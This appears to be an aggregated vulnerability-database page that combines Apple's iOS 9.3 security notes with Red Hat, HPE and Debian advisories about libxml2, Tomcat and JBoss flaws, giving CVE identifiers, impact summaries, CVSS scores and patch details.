WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A website may be able to track sensitive user information Description: An issue existed in the handling of attachment URLs. This issue was addressed through improved URL handling. CVE-ID CVE-2016-1781 : Devdatta Akhawe of Dropbox, Inc.
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A website may be able to track sensitive user information Description: A hidden web page may be able to access device- orientation and device-motion data. This issue was addressed by suspending the availability of this data when the web view is hidden. CVE-ID CVE-2016-1780 : Maryam Mehrnezhad, Ehsan Toreini, Siamak F. Shahandashti, and Feng Hao of the School of Computing Science, Newcastle University, UK
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may reveal a user's current location Description: An issue existed in the parsing of geolocation requests. This was addressed through improved validation of the security origin for geolocation requests. CVE-ID CVE-2016-1779 : xisigr of Tencent's Xuanwu Lab (http://www.tencent.com)
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious website may be able to access restricted ports on arbitrary servers Description: A port redirection issue was addressed through additional port validation. CVE-ID CVE-2016-1782 : Muneaki Nishimura (nishimunea) of Recruit Technologies Co.,Ltd.
WebKit History Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash Description: A resource exhaustion issue was addressed through improved input validation. CVE-ID CVE-2016-1784 : Moony Li and Jack Tang of TrendMicro and 李普君 of 无声信息技术PKAV Team (PKAV.net)
WebKit Page Loading Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may lead to user interface spoofing Description: Redirect responses may have allowed a malicious website to display an arbitrary URL and read cached contents of the destination origin. This issue was addressed through improved URL display logic. CVE-ID CVE-2016-1786 : ma.la of LINE Corporation
WebKit Page Loading Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious website may exfiltrate data cross-origin Description: A caching issue existed with character encoding. This was addressed through additional request checking. CVE-ID CVE-2016-1785 : an anonymous researcher
Wi-Fi Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: A frame validation and memory corruption issue existed for a given ethertype. This issue was addressed through additional ethertype validation and improved memory handling. CVE-ID CVE-2016-0801 : an anonymous researcher CVE-2016-0802 : an anonymous researcher
Installation note:
This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
- Navigate to Settings
- Select General
- Select About. The version after applying this update will be "9.3 ".
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
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Show details on source website{
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"data": "The xmlParseMisc function in parser.c in libxml2 before 2.9.3 allows context-dependent attackers to cause a denial of service (out-of-bounds heap read) via unspecified vectors related to incorrect entities boundaries and start tags. libxml2 is prone to a denial-of-service vulnerability. \nAttackers can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. \nlibxml2 2.9.2 is vulnerable; other versions may also be affected. Libxml2 is a C language-based function library for parsing XML documents developed by the GNOME project team. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. \n\nThis release of Red Hat JBoss Web Server 3.0.3 serves as a replacement for\nRed Hat JBoss Web Server 3.0.2, and includes bug fixes and enhancements,\nwhich are documented in the Release Notes documented linked to in the\nReferences. (CVE-2015-5312,\nCVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-7942,\nCVE-2015-8035, CVE-2015-8710, CVE-2015-7941, CVE-2015-8241, CVE-2015-8242,\nCVE-2015-8317)\n\n* A session fixation flaw was found in the way Tomcat recycled the\nrequestedSessionSSL field. If at least one web application was configured\nto use the SSL session ID as the HTTP session ID, an attacker could reuse a\npreviously used session ID for further requests. (CVE-2015-5346)\n\n* A CSRF flaw was found in Tomcat\u0027s the index pages for the Manager and\nHost Manager applications. These applications included a valid CSRF token\nwhen issuing a redirect as a result of an unauthenticated request to the\nroot of the web application. This token could then be used by an attacker\nto perform a CSRF attack. (CVE-2015-5351)\n\n* It was found that several Tomcat session persistence mechanisms could\nallow a remote, authenticated user to bypass intended SecurityManager\nrestrictions and execute arbitrary code in a privileged context via a web\napplication that placed a crafted object in a session. (CVE-2016-0714)\n\n* A security manager bypass flaw was found in Tomcat that could allow\nremote, authenticated users to access arbitrary application data,\npotentially resulting in a denial of service. (CVE-2016-0763)\n\n* A use-after-free flaw was found in the way OpenSSL imported malformed\nElliptic Curve private keys. (CVE-2015-0209)\n\n* It was found that Tomcat could reveal the presence of a directory even\nwhen that directory was protected by a security constraint. A user could\nmake a request to a directory via a URL not ending with a slash and,\ndepending on whether Tomcat redirected that request, could confirm whether\nthat directory existed. (CVE-2015-5345)\n\n* It was found that Tomcat allowed the StatusManagerServlet to be loaded by\na web application when a security manager was configured. This allowed a\nweb application to list all deployed web applications and expose sensitive\ninformation such as session IDs. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. JIRA issues fixed (https://issues.jboss.org/):\n\nJWS-271 - User submitted session ID\nJWS-272 - User submitted session ID\nJWS-276 - Welcome File processing refactoring - CVE-2015-5345 low\nJWS-277 - Welcome File processing refactoring - CVE-2015-5345 low\nJWS-303 - Avoid useless session creation for manager webapps - CVE-2015-5351 moderate\nJWS-304 - Restrict another manager servlet - CVE-2016-0706 low\nJWS-349 - Session serialization safety - CVE-2016-0714 moderate\nJWS-350 - Protect ResourceLinkFactory.setGlobalContext() - CVE-2016-0763 moderate\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n\na-c04944172\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04944172\nVersion: 1\n\nHPSBGN03537 rev.1 - HPE IceWall Federation Agent and IceWall File Manager\nrunning libXML2, Remote or Local Denial of Service (DoS)\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\n - IceWall File Manager 3.0\n - IceWall Federation Agent 3.0\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2015-5312 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1\nCVE-2015-7497 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-7498 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-7499 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2015-7500 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-7941 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-7942 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-8241 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4\nCVE-2015-8242 (AV:N/AC:M/Au:N/C:P/I:N/A:P) 5.8\nCVE-2015-8317 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHPE recommends applying the latest OS vendor security patches for libXML2 to\nresolve the vulnerabilities in the libXML2 library. \n\nPlease note that the HP IceWall product is only available in Japan. \n\nHISTORY\nVersion:1 (rev.1) - 22 January 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability with any HPE supported\nproduct, send Email to: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 2.8.0+dfsg1-7+wheezy5. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.9.1+dfsg1-5+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2.9.3+dfsg1-1 or earlier versions. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.3+dfsg1-1 or earlier versions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: libxml2 security update\nAdvisory ID: RHSA-2015:2550-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2550.html\nIssue date: 2015-12-07\nCVE Names: CVE-2015-1819 CVE-2015-5312 CVE-2015-7497 \n CVE-2015-7498 CVE-2015-7499 CVE-2015-7500 \n CVE-2015-7941 CVE-2015-7942 CVE-2015-8241 \n CVE-2015-8242 CVE-2015-8317 \n=====================================================================\n\n1. Summary:\n\nUpdated libxml2 packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. \n\nSeveral denial of service flaws were found in libxml2, a library providing\nsupport for reading, modifying, and writing XML and HTML files. A remote\nattacker could provide a specially crafted XML or HTML file that, when\nprocessed by an application using libxml2, would cause that application to\nuse an excessive amount of CPU, leak potentially sensitive information, or\nin certain cases crash the application. (CVE-2015-1819, CVE-2015-5312,\nCVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500 CVE-2015-7941,\nCVE-2015-7942, CVE-2015-8241, CVE-2015-8242, CVE-2015-8317, BZ#1213957,\nBZ#1281955)\n\nRed Hat would like to thank the GNOME project for reporting CVE-2015-7497,\nCVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-8241, CVE-2015-8242,\nand CVE-2015-8317. Upstream acknowledges Kostya Serebryany of Google as the\noriginal reporter of CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, and\nCVE-2015-7500; Hugh Davenport as the original reporter of CVE-2015-8241 and\nCVE-2015-8242; and Hanno Boeck as the original reporter of CVE-2015-8317. \nThe CVE-2015-1819 issue was discovered by Florian Weimer of Red Hat\nProduct Security. \n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct these issues. The desktop must be\nrestarted (log out, then log back in) for this update to take effect. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1211278 - CVE-2015-1819 libxml2: denial of service processing a crafted XML document\n1213957 - libxml2: out-of-bounds memory access when parsing an unclosed HTML comment\n1274222 - CVE-2015-7941 libxml2: Out-of-bounds memory access\n1276297 - CVE-2015-7942 libxml2: heap-based buffer overflow in xmlParseConditionalSections()\n1276693 - CVE-2015-5312 libxml2: CPU exhaustion when processing specially crafted XML input\n1281862 - CVE-2015-7497 libxml2: Heap-based buffer overflow in xmlDictComputeFastQKey\n1281879 - CVE-2015-7498 libxml2: Heap-based buffer overflow in xmlParseXmlDecl\n1281925 - CVE-2015-7499 libxml2: Heap-based buffer overflow in xmlGROW\n1281930 - CVE-2015-8317 libxml2: Out-of-bounds heap read when parsing file with unfinished xml declaration\n1281936 - CVE-2015-8241 libxml2: Buffer overread with XML parser in xmlNextChar\n1281943 - CVE-2015-7500 libxml2: Heap buffer overflow in xmlParseMisc\n1281950 - CVE-2015-8242 libxml2: Buffer overread with HTML parser in push mode in xmlSAX2TextNode\n1281955 - libxml2: Multiple out-of-bounds reads in xmlDictComputeFastKey.isra.2 and xmlDictAddString.isra.O\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\naarch64:\nlibxml2-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.aarch64.rpm\n\nppc64:\nlibxml2-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.ppc64.rpm\n\nppc64le:\nlibxml2-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-python-2.9.1-6.el7_2.2.ppc64le.rpm\n\ns390x:\nlibxml2-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-python-2.9.1-6.el7_2.2.s390x.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.aarch64.rpm\n\nppc64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-static-2.9.1-6.el7_2.2.ppc64.rpm\n\nppc64le:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-static-2.9.1-6.el7_2.2.ppc64le.rpm\n\ns390x:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-static-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-static-2.9.1-6.el7_2.2.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-1819\nhttps://access.redhat.com/security/cve/CVE-2015-5312\nhttps://access.redhat.com/security/cve/CVE-2015-7497\nhttps://access.redhat.com/security/cve/CVE-2015-7498\nhttps://access.redhat.com/security/cve/CVE-2015-7499\nhttps://access.redhat.com/security/cve/CVE-2015-7500\nhttps://access.redhat.com/security/cve/CVE-2015-7941\nhttps://access.redhat.com/security/cve/CVE-2015-7942\nhttps://access.redhat.com/security/cve/CVE-2015-8241\nhttps://access.redhat.com/security/cve/CVE-2015-8242\nhttps://access.redhat.com/security/cve/CVE-2015-8317\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWZZK6XlSAg2UNWIIRAlx5AKCfIxP9TLM+V/vmQq6MVeUpjiGltgCgnOgZ\nIOmptwborGrgz5fLqra3STg=\n=bVgd\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-1 iOS 9.3\n\niOS 9.3 is now available and addresses the following:\n\nAppleUSBNetworking\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the parsing of\ndata from USB devices. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path\n\nFontParser\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIOHIDFamily\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to determine kernel memory layout\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to cause a denial of service\nDescription: A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to bypass code signing\nDescription: A permissions issue existed in which execute permission\nwas incorrectly granted. This issue was addressed through improved\npermission validation. \nCVE-ID\nCVE-2016-1751 : Eric Monti of Square Mobile Security\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A race condition existed during the creation of new\nprocesses. This was addressed through improved state handling. \nCVE-ID\nCVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vila\u00e7a\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1758 : Brandon Azad\n\nLaunchServices\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to modify events from other\napplications\nDescription: An event handler validation issue existed in the XPC\nServices API. This issue was addressed through improved message\nvalidation. \nCVE-ID\nCVE-2016-1760 : Proteas of Qihoo 360 Nirvan Team\n\nlibxml2\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1761 : wol0xff working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1762\n\nMessages\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may auto-fill text\ninto other Message threads\nDescription: An issue existed in the parsing of SMS URLs. This issue\nwas addressed through improved URL validation. \nCVE-ID\nCVE-2016-1763 : CityTog\n\nMessages\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker who is able to bypass Apple\u0027s certificate\npinning, intercept TLS connections, inject messages, and record\nencrypted attachment-type messages may be able to read attachments\nDescription: A cryptographic issue was addressed by rejecting\nduplicate messages on the client. \nCVE-ID\nCVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk,\nIan Miers, and Michael Rushanan of Johns Hopkins University\n\nProfiles\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An untrusted MDM profile may be incorrectly displayed as\nverified\nDescription: A certificate validation issue existed in MDM profiles. \nThis was addressed through additional checks. \nCVE-ID\nCVE-2016-1766 : Taylor Boyko working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nSecurity\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nTrueTypeScaler\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1778 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1783 : Mihai Parparita of Google\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A website may be able to track sensitive user information\nDescription: An issue existed in the handling of attachment URLs. \nThis issue was addressed through improved URL handling. \nCVE-ID\nCVE-2016-1781 : Devdatta Akhawe of Dropbox, Inc. \n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A website may be able to track sensitive user information\nDescription: A hidden web page may be able to access device-\norientation and device-motion data. This issue was addressed by\nsuspending the availability of this data when the web view is hidden. \nCVE-ID\nCVE-2016-1780 : Maryam Mehrnezhad, Ehsan Toreini, Siamak F. \nShahandashti, and Feng Hao of the School of Computing Science,\nNewcastle University, 